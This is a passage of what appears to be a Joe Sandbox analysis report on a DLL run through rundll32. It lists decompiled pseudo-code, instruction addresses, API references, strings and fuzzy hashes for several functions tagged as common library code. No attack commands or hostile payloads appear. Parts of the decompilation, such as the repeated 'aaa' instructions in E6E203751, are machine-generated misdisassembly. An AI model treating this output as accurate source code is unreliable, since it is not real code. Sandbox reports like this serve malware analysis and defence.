										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6E20C59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6E20C59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6E20BD8B(_t198);
						goto L13;
					}
				}
			}


































                          0x6e20b968
                          0x6e20b96f
                          0x6e20b977
                          0x6e20b97a
                          0x6e20b980
                          0x6e20b983
                          0x6e20b987
                          0x6e20b98a
                          0x6e20b98f
                          0x6e20b998
                          0x6e20b99d
                          0x6e20b9a5
                          0x6e20b9a7
                          0x6e20b9ab
                          0x6e20b9af
                          0x6e20b9be
                          0x6e20b9b1
                          0x6e20b9b1
                          0x6e20b9b1
                          0x6e20b9c4
                          0x6e20b9e1
                          0x6e20b9e9
                          0x6e20b9eb
                          0x6e20b9f5
                          0x6e20b9f8
                          0x6e20b9ff
                          0x6e20ba3f
                          0x6e20ba44
                          0x6e20ba4a
                          0x6e20ba4b
                          0x6e20ba54
                          0x6e20ba5a
                          0x6e20ba60
                          0x6e20ba69
                          0x6e20ba6b
                          0x6e20ba6b
                          0x6e20ba6d
                          0x6e20ba74
                          0x6e20ba77
                          0x6e20ba7a
                          0x6e20ba7d
                          0x6e20ba84
                          0x6e20bb04
                          0x6e20bb04
                          0x6e20bb06
                          0x6e20bb1e
                          0x6e20bb21
                          0x6e20bb2a
                          0x6e20bb31
                          0x6e20bb35
                          0x6e20bb45
                          0x6e20bb49
                          0x6e20bb4b
                          0x6e20bb4e
                          0x6e20bb55
                          0x6e20bc5d
                          0x6e20bc60
                          0x6e20bc63
                          0x6e20bc63
                          0x6e20bc66
                          0x6e20bc6a
                          0x6e20bc6d
                          0x6e20bc6f
                          0x6e20bc6f
                          0x6e20bc74
                          0x6e20bcdd
                          0x6e20bcdd
                          0x00000000
                          0x6e20bc76
                          0x6e20bc76
                          0x6e20bc7a
                          0x6e20bc7f
                          0x00000000
                          0x00000000
                          0x6e20bc81
                          0x6e20bc84
                          0x6e20bca5
                          0x6e20bca7
                          0x6e20bcc2
                          0x6e20bcc2
                          0x6e20bcc8
                          0x6e20bcca
                          0x6e20bcca
                          0x00000000
                          0x6e20bcc8
                          0x6e20bcb0
                          0x6e20bcb3
                          0x6e20bcb5
                          0x6e20bcb5
                          0x6e20bcbd
                          0x6e20bcc0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bcc0
                          0x6e20bc89
                          0x6e20bc8c
                          0x6e20bc92
                          0x6e20bc94
                          0x6e20bc97
                          0x6e20bc97
                          0x6e20bca0
                          0x6e20bca3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bca3
                          0x6e20bcce
                          0x6e20bcd2
                          0x6e20bcd5
                          0x6e20bcd7
                          0x6e20bcda
                          0x6e20bcda
                          0x6e20bce0
                          0x6e20bce3
                          0x6e20bce6
                          0x6e20bcee
                          0x6e20bcfa
                          0x6e20bcfa
                          0x6e20bc74
                          0x6e20bb5b
                          0x6e20bb5e
                          0x6e20bb62
                          0x6e20bb66
                          0x6e20bb66
                          0x6e20bb6e
                          0x6e20bb71
                          0x6e20bb80
                          0x6e20bb88
                          0x6e20bb8b
                          0x6e20bb90
                          0x6e20bbdc
                          0x6e20bbdf
                          0x6e20bbe2
                          0x6e20bbe5
                          0x6e20bbe8
                          0x6e20bbea
                          0x6e20bbea
                          0x6e20bbec
                          0x6e20bbf0
                          0x6e20bc42
                          0x6e20bc44
                          0x00000000
                          0x00000000
                          0x6e20bc46
                          0x6e20bc4c
                          0x6e20bc4e
                          0x6e20bc4e
                          0x6e20bc54
                          0x6e20bc59
                          0x00000000
                          0x6e20bc56
                          0x6e20bc56
                          0x00000000
                          0x6e20bc56
                          0x6e20bbf2
                          0x6e20bbf2
                          0x6e20bbf6
                          0x00000000
                          0x00000000
                          0x6e20bbf8
                          0x6e20bbfc
                          0x6e20bc10
                          0x6e20bbfe
                          0x6e20bc00
                          0x6e20bc05
                          0x6e20bc08
                          0x6e20bc0b
                          0x6e20bc0b
                          0x6e20bc13
                          0x6e20bc16
                          0x00000000
                          0x6e20bc18
                          0x6e20bc1d
                          0x6e20bc22
                          0x6e20bc22
                          0x00000000
                          0x6e20bc22
                          0x6e20bc16
                          0x6e20bb92
                          0x6e20bb96
                          0x6e20bb9c
                          0x6e20bb9f
                          0x6e20bba1
                          0x6e20bbab
                          0x6e20bbae
                          0x6e20bbb2
                          0x6e20bbb2
                          0x6e20bbab
                          0x6e20bbb9
                          0x6e20bbbc
                          0x6e20bbc0
                          0x6e20bbc2
                          0x6e20bbc2
                          0x6e20bbc9
                          0x6e20bbcf
                          0x6e20bbd2
                          0x6e20bbd4
                          0x6e20bbd4
                          0x6e20bbd7
                          0x6e20bbd7
                          0x6e20bbc9
                          0x6e20bc23
                          0x6e20bc25
                          0x6e20bc34
                          0x6e20bc3c
                          0x6e20bc3f
                          0x00000000
                          0x6e20bc3f
                          0x6e20bb08
                          0x6e20bb08
                          0x6e20bb0a
                          0x00000000
                          0x00000000
                          0x6e20bb0c
                          0x6e20bb1b
                          0x00000000
                          0x6e20bb1b
                          0x6e20ba89
                          0x6e20ba8d
                          0x6e20ba8d
                          0x6e20ba98
                          0x00000000
                          0x6e20ba9a
                          0x6e20ba9e
                          0x6e20baa1
                          0x6e20baa4
                          0x6e20baae
                          0x6e20bab5
                          0x6e20bafd
                          0x6e20bafd
                          0x6e20baff
                          0x00000000
                          0x00000000
                          0x6e20bb03
                          0x00000000
                          0x6e20bb03
                          0x6e20baba
                          0x6e20babe
                          0x6e20babe
                          0x6e20bac3
                          0x6e20bac9
                          0x6e20bae0
                          0x6e20bae2
                          0x6e20baef
                          0x6e20baf0
                          0x6e20baf3
                          0x6e20baf6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bacb
                          0x6e20bacf
                          0x6e20bad3
                          0x6e20bad8
                          0x6e20bad8
                          0x6e20bade
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bade
                          0x6e20bac9
                          0x6e20ba98
                          0x6e20ba62
                          0x6e20ba64
                          0x6e20ba64
                          0x00000000
                          0x6e20ba64
                          0x6e20ba56
                          0x00000000
                          0x6e20ba01
                          0x6e20ba04
                          0x6e20ba08
                          0x6e20ba08
                          0x6e20ba0d
                          0x6e20ba13
                          0x6e20ba1a
                          0x6e20ba1e
                          0x6e20ba22
                          0x6e20ba27
                          0x6e20ba27
                          0x6e20ba2a
                          0x6e20ba2d
                          0x00000000
                          0x6e20ba2f
                          0x6e20ba2f
                          0x00000000
                          0x6e20ba2f
                          0x6e20ba15
                          0x6e20ba15
                          0x6e20ba32
                          0x6e20ba37
                          0x6e20ba3a
                          0x00000000
                          0x6e20ba3a
                          0x6e20ba13

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6E20B96F
                            • Part of subcall function 6E20A2F1: __EH_prolog3.LIBCMT ref: 6E20A2F8
                            • Part of subcall function 6E20A2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
                            • Part of subcall function 6E20A2F1: int.LIBCPMT ref: 6E20A319
                            • Part of subcall function 6E20A2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
                          • _Find_unchecked1.LIBCPMT ref: 6E20BB80
                          Strings
                          • 0123456789ABCDEFabcdef-+Xx, xrefs: 6E20B9D7
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
                          • String ID: 0123456789ABCDEFabcdef-+Xx
                          • API String ID: 1853221402-2799312399
                          • Opcode ID: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
                          • Instruction ID: 9058b79f0aed7c49f61ba439b98479c1ba6c938a87b63f456b38d7e56f044c7b
                          • Opcode Fuzzy Hash: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
                          • Instruction Fuzzy Hash: A6C19E34D1828E8FDF62CBE8C490BDCBBB7AF45304F1444A9D8966B2CECB649945CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2460ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 6E24617D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
                          • Instruction ID: c41f90c39b4b520227d771ef12d26310ff06030748f0458a2c9aae07ff911396
                          • Opcode Fuzzy Hash: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
                          • Instruction Fuzzy Hash: DE51ACE1AB810FD7DB456BE4CB9075A3BA7EB01B02F20CD5CD095823DDEB3184A4DA52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E6E25DBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6E254323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e272f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e272f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6E24BF09(_t23, _t23);
									goto L25;
								}
								if(E6E254323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

















                          0x6e25dbb4
                          0x6e25dbb5
                          0x6e25dbbc
                          0x6e25dc62
                          0x6e25dc76
                          0x6e25dc7b
                          0x6e25dc7d
                          0x6e25dc83
                          0x6e25dc86
                          0x6e25dc88
                          0x6e25dc8a
                          0x6e25dc8a
                          0x6e25dc90
                          0x6e25dc95
                          0x6e25dc95
                          0x6e25dc7f
                          0x6e25dc7f
                          0x00000000
                          0x6e25dc7f
                          0x6e25dbc2
                          0x6e25dbc7
                          0x00000000
                          0x00000000
                          0x6e25dbcd
                          0x6e25dbd2
                          0x6e25dbd4
                          0x6e25dbd4
                          0x6e25dbda
                          0x00000000
                          0x00000000
                          0x6e25dbdf
                          0x6e25dbf6
                          0x6e25dbf6
                          0x6e25dbff
                          0x6e25dc01
                          0x00000000
                          0x00000000
                          0x6e25dc03
                          0x6e25dc08
                          0x6e25dc0a
                          0x6e25dc0a
                          0x6e25dc10
                          0x00000000
                          0x00000000
                          0x6e25dc15
                          0x6e25dc33
                          0x6e25dc33
                          0x6e25dc35
                          0x6e25dc5a
                          0x00000000
                          0x6e25dc5f
                          0x6e25dc52
                          0x00000000
                          0x00000000
                          0x6e25dc54
                          0x00000000
                          0x6e25dc54
                          0x6e25dc17
                          0x6e25dc1f
                          0x00000000
                          0x00000000
                          0x6e25dc21
                          0x6e25dc24
                          0x6e25dc2a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25dc2c
                          0x6e25dc2e
                          0x6e25dc30
                          0x6e25dc30
                          0x00000000
                          0x6e25dc30
                          0x6e25dbe1
                          0x6e25dbe9
                          0x00000000
                          0x00000000
                          0x6e25dbeb
                          0x6e25dbee
                          0x6e25dbf4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25dbf4
                          0x6e25dbfa
                          0x6e25dbfc
                          0x6e25dbfc
                          0x00000000

                          APIs
                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E25DE50,?,00000050,?,?,?,?,?), ref: 6E25DC8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ACP$OCP
                          • API String ID: 0-711371036
                          • Opcode ID: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
                          • Instruction ID: 765538ebe0c3eaa7bb62265b682247ad23f188a8fce3eedb0c41bb3cc0437e93
                          • Opcode Fuzzy Hash: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
                          • Instruction Fuzzy Hash: AE21C466A6410FA7E754CFD8CB00B8B73ABAB45B53F528424E90AD7308E772D961CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21FAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E21FAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6e2c6e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6E22079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6e2c506c; // 0x5cc08226
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6e2c506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6E24A8CA(_t19, 0x6e2c6e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6E24A8CA(_t25, 0x6e2c6e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6e2c6e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6E2207A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6E220990(__ebx, _t49, 0x6e2c2780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6e1e0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6e1e003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6e1e0000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6e1e0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6e1e0018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6e1e0018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6E21F931(0x6e1e0000, _a4 - 0x6e1e0000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}





















                          0x6e21faf6
                          0x6e21fafd
                          0x6e21fb00
                          0x6e21fb02
                          0x6e21fb09
                          0x6e21fb09
                          0x6e21fb0e
                          0x6e21fb10
                          0x6e21fb38
                          0x6e21fb38
                          0x6e21fb40
                          0x6e21fb49
                          0x6e21fb51
                          0x6e21fb53
                          0x6e21fb53
                          0x6e21fb59
                          0x6e21fb5c
                          0x6e21fb5f
                          0x6e21fb62
                          0x6e21fb63
                          0x6e21fb64
                          0x6e21fb6a
                          0x6e21fb6d
                          0x6e21fb73
                          0x6e21fb76
                          0x6e21fb77
                          0x6e21fb78
                          0x00000000
                          0x6e21fb12
                          0x6e21fb12
                          0x6e21fb14
                          0x00000000
                          0x6e21fb16
                          0x6e21fb1b
                          0x6e21fb21
                          0x6e21fb23
                          0x6e21fb34
                          0x6e21fb34
                          0x6e21fb25
                          0x6e21fb2a
                          0x6e21fb30
                          0x6e21fb32
                          0x6e21fb7a
                          0x6e21fb7a
                          0x6e21fb81
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e21fb32
                          0x6e21fb23
                          0x6e21fb14
                          0x6e21fb85
                          0x6e21fb04
                          0x6e21fb04
                          0x6e21fb07
                          0x6e21fb88
                          0x6e21fb8d
                          0x6e21fb95
                          0x6e21fb9a
                          0x6e21fba3
                          0x6e21fbaa
                          0x6e21fc09
                          0x6e21fc09
                          0x6e21fc10
                          0x6e21fc10
                          0x6e21fbac
                          0x6e21fbac
                          0x6e21fbb1
                          0x6e21fbbb
                          0x00000000
                          0x6e21fbbd
                          0x6e21fbc2
                          0x6e21fbc9
                          0x00000000
                          0x6e21fbcb
                          0x6e21fbd7
                          0x6e21fbde
                          0x6e21fbe0
                          0x00000000
                          0x6e21fbe2
                          0x6e21fbe2
                          0x6e21fbe6
                          0x00000000
                          0x6e21fbe8
                          0x6e21fbe8
                          0x6e21fbef
                          0x6e21fbef
                          0x6e21fbe6
                          0x6e21fbe0
                          0x6e21fbc9
                          0x6e21fbbb
                          0x6e21fc15
                          0x6e21fc21
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e21fb07
                          0x6e21faf8
                          0x6e21fafb
                          0x6e21fafb

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Tn,n$`n,n
                          • API String ID: 0-3894424707
                          • Opcode ID: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
                          • Instruction ID: 0fd38b8e3836c9714727457c7d25762572ff14ae64ee4c53b92351e2029f33ae
                          • Opcode Fuzzy Hash: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
                          • Instruction Fuzzy Hash: FD11B276C1461E9BEF80CEE8C454ADF77E79F0AB25F104166D921EB280D6B0C7018BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2059F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Deallocate
                          • String ID: :B n$[json.exception.
                          • API String ID: 1075933841-3849622167
                          • Opcode ID: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
                          • Instruction ID: 218fd96fd83dae967e78c502c145d0d31e2c87026cedc3ff35e28bf0706639ee
                          • Opcode Fuzzy Hash: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
                          • Instruction Fuzzy Hash: E50108765042195F8314CF58DCC0C4BB7DEEE892147100A6DF429C7341EB31E90587A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E203751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                          Download Yara Rule
                          C-Code - Quality: 61%
                          			E6E203751(void* __ebx, signed int* __ecx, void* __edi, void* __esi) {
				signed int _t35;
				void* _t42;
				signed int _t46;
				signed char _t51;
				signed char _t53;
				signed int* _t55;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr* _t60;

				E6E2200E0(0x6e268012, __ebx, __edi, __esi, 0x38);
				_t58 = __ecx;
				_t51 =  *((intOrPtr*)(_t59 + 8));
				_t35 = _t51 & 0x000000ff;
				if(_t35 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t51;
					if(_t51 != 0) {
						goto L4;
					} else {
						E6E201F9A(_t59 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
						_t53 = _t59 - 0x44;
						E6E200C7C(__ebx, _t53, __edi, _t58, __eflags);
						 *_t60 = 0x6e2c3430;
						_t42 = E6E223D74(_t59 - 0x44, _t59 - 0x28);
						asm("scasb");
						asm("aaa");
						 *(_t58 + 0x71) =  *(_t58 + 0x71) & _t53;
						asm("aaa");
						 *(_t58 - 0x7e) =  *(_t58 - 0x7e) & _t53;
						asm("aaa");
						 *(_t58 - 0x77) =  *(_t58 - 0x77) & _t53;
						asm("aaa");
						 *(_t58 - 0x69) =  *(_t58 - 0x69) & _t53;
						asm("aaa");
						 *(_t58 - 0x64) =  *(_t58 - 0x64) & _t53;
						asm("aaa");
						 *(_t58 - 0x64) =  *(_t58 - 0x64) & _t53;
						asm("aaa");
						 *(_t58 - 0x5b) =  *(_t58 - 0x5b) & _t53;
						asm("aaa");
						 *(_t58 - 0x70) =  *(_t58 - 0x70) & _t53;
						asm("aaa");
						 *(_t58 - 0x75) =  *(_t58 - 0x75) & _t53;
						0xafabfb26();
						_t55 = _t53 + 1 + _t42 + 0xae;
						asm("clc");
						_t46 =  *_t55;
						__eflags = _t46 - _t55[1];
						_t32 = _t46 == _t55[1];
						__eflags = _t32;
						return _t46 & 0xffffff00 | _t32;
					}
				} else {
					switch( *((intOrPtr*)(_t35 * 4 +  &M6E2037E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t48 = E6E204B1C(__ebx, __edi, __ecx, _t61);
							goto L3;
						case 2:
							__eax = E6E204B64(__eflags);
							goto L3;
						case 3:
							__eax = E6E204B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6E204BCF(__eflags);
							L3:
							 *_t58 = _t48;
							L4:
							return E6E22008A(_t58, _t49, _t56, _t58);
							goto L14;
					}
				}
				L14:
			}












                          0x6e203758
                          0x6e20375d
                          0x6e20375f
                          0x6e203762
                          0x6e203768
                          0x6e2037b3
                          0x6e2037b6
                          0x6e2037b8
                          0x00000000
                          0x6e2037ba
                          0x6e2037c2
                          0x6e2037c7
                          0x6e2037cf
                          0x6e2037d2
                          0x6e2037da
                          0x6e2037e2
                          0x6e2037e9
                          0x6e2037ea
                          0x6e2037eb
                          0x6e2037ee
                          0x6e2037ef
                          0x6e2037f2
                          0x6e2037f3
                          0x6e2037f6
                          0x6e2037f7
                          0x6e2037fa
                          0x6e2037fb
                          0x6e2037fe
                          0x6e2037ff
                          0x6e203802
                          0x6e203803
                          0x6e203806
                          0x6e203807
                          0x6e20380a
                          0x6e20380b
                          0x6e203811
                          0x6e203818
                          0x6e20381a
                          0x6e20381d
                          0x6e20381f
                          0x6e203822
                          0x6e203822
                          0x6e203825
                          0x6e203825
                          0x6e20376a
                          0x6e20376a
                          0x00000000
                          0x6e2037ae
                          0x00000000
                          0x00000000
                          0x6e203771
                          0x00000000
                          0x00000000
                          0x6e203782
                          0x00000000
                          0x00000000
                          0x6e203789
                          0x00000000
                          0x00000000
                          0x6e203797
                          0x00000000
                          0x00000000
                          0x6e20379c
                          0x6e20379f
                          0x00000000
                          0x00000000
                          0x6e2037a5
                          0x6e2037a8
                          0x00000000
                          0x00000000
                          0x6e203790
                          0x6e203776
                          0x6e203776
                          0x6e203778
                          0x6e20377f
                          0x00000000
                          0x00000000
                          0x6e20376a
                          0x00000000

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6E203758
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2037E2
                          Strings
                          • 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E2037BA
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
